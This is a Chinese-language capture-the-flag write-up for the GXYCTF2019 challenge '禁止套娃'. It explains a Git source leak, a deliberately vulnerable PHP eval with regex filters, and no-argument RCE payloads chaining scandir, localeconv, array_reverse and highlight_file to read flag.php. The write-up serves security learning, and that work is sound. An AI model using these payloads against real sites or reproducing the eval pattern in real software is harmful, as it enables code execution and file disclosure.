[GXYCTF2019]禁止套娃

40 篇文章 1 订阅
38 篇文章 0 订阅

这个题目主要是无参数RCE,看到题目人都傻了,看了一下大佬的博客差不多懂了。

大佬博客

首先用御剑扫一下,得到了Git泄露的线索。git一下得到源码:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

首先是 isset($_GET['exp'])判空,所不为空则执行下面的语句。

然后是if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
这里过滤了几个伪协议,防止用伪协议读取文件。

接着是if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
(?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。

最后是if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
正则匹配掉了et/na/info等关键字,很多函数都用不了。

然后执行一下eval得到flag。

首先利用scandir(.)函数得到当前目录下的文件并用print_r()函数输出。localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.

?exp=print_r(scandir(pos(localeconv())));

然后利用array_reverse()函数将数组逆序,并利用highlight_file()函数进行高亮。

?exp=print_r(next(array_reverse(scandir(pos(localeconv())))));    #得到flag.php
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));    #得到flag
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值